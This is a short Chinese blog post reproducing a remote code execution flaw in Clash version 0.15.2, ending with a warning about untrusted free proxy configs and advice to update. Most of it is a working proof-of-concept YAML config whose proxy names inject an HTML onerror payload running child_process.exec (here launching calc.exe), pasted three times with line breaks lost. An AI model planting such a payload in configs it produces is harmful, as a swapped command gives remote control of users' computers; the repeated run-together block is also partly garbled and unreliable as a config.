杂谈
Clash相信你们都不陌生,就是我们平常使用VPN时最常用的软件
就在前几个小时爆出了RCE漏洞,我们立马给大家复现一下!
clash存在漏洞版本
目前发现的漏洞版本是0.15.2,您可以下载下面的软件进行复现
POC
新建yaml
文件
port: 7890socks-port: 7891allow-lan: truemode: Rulelog-level: infoexternal-controller: :9090proxies:- name: a<img/src=\"1\"/onerror=eval(`require(\"child_process\").exec(\"calc.exe\");`);>type: socks5server: 127.0.0.1port: \"17938\"skip-cert-verify: true- name: abctype: socks5server: 127.0.0.1port: \"8088\"skip-cert-verify: trueproxy-groups:-name: <img/src=\"1\"/onerror=eval(`require(\"child_process\").exec(\"calc.exe\");`);>type: selectproxies:- a<img/src=\"1\"/onerror=eval(`require(\"child_process\").exec(\"calc.exe\");`);>port: 7890 socks-port: 7891 allow-lan: true mode: Rule log-level: info external-controller: :9090 proxies: - name: a<img/src=\"1\"/onerror=eval(`require(\"child_process\").exec(\"calc.exe\");`);> type: socks5 server: 127.0.0.1 port: \"17938\" skip-cert-verify: true - name: abc type: socks5 server: 127.0.0.1 port: \"8088\" skip-cert-verify: true proxy-groups: - name: <img/src=\"1\"/onerror=eval(`require(\"child_process\").exec(\"calc.exe\");`);> type: select proxies: - a<img/src=\"1\"/onerror=eval(`require(\"child_process\").exec(\"calc.exe\");`);>port: 7890 socks-port: 7891 allow-lan: true mode: Rule log-level: info external-controller: :9090 proxies: - name: a<img/src=\"1\"/onerror=eval(`require(\"child_process\").exec(\"calc.exe\");`);> type: socks5 server: 127.0.0.1 port: \"17938\" skip-cert-verify: true - name: abc type: socks5 server: 127.0.0.1 port: \"8088\" skip-cert-verify: true proxy-groups: - name: <img/src=\"1\"/onerror=eval(`require(\"child_process\").exec(\"calc.exe\");`);> type: select proxies: - a<img/src=\"1\"/onerror=eval(`require(\"child_process\").exec(\"calc.exe\");`);>
图文教程
新建完yaml文件后,你需要手动导入,点击import

然后切换到这里

切换节点时会弹出计算器,说明远程代码执行成功了

漏洞的利用
如果你是从一些垃圾网站上复制的免费节点,小心不要被人恶意植入了远程执行代码,很有可能导致电脑被远程控制,因此,您可以选择更新到最新版本,此问题就不存在了!
THE END
暂无评论内容